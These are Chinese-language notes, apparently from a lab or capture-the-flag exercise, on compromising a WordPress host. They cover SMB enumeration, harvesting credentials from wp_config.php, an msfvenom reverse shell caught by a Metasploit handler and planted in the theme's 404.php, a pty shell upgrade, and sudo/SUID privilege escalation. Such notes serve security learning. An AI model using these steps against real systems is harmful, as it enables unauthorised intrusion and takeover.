3.SMB:端口139,445
查看:smbclinet -L IP
连接:smbclient '\\IP\路径' 或者 smbclient //IP地址//路径
smb>ls
smb>help
get 下载指定文件分析
deets.txt:里面有个12345密码,留着!!!
重点关注应用的配置文件:如wp_config.php
可能会发现mysql的用户名和密码
远程登录mysql试试:
mysql -h ip地址 -u Admin -p
不让远程登录,不行!!!!!
再试ssh服务是否可用:
ssh Admin@IP地址
用发现的密码登录试试,也不行!
但是,都要试试!!!!!!!
nmap -A -T4
接下来用searchsploit 服务版本信息
也没有有用的信息
利用dirb 、nikto探测网站
发现wp-admin:哇哈哈哈
#利用网站uplods的漏洞,上传反射文件,并在攻击机开始监听
上传点:
msfvenom -p 载荷 相关设置 -f 文件类型 >反射目标文件
攻击机使用exploit/multi/handler
设置载荷、配置主机、端口
并启动主机监听
随后:
利用wordpress漏洞:利用前面找到的mysql密码,登录WordPress后台
技巧:
优化终端:python -c "import pty;pty.spawn('/bin/bash')"
在appearence下修改404.php,内容为新建的反射文件内容
浏览该404.php文件,启动反射
提权:
利用su - root 提权
sudo -l 查看可以使用哪些命令
sudo 执行相关命令
sudo su 提升到root权限
find / -perm -4000 2>/dev/null 查看有root执行权限的命令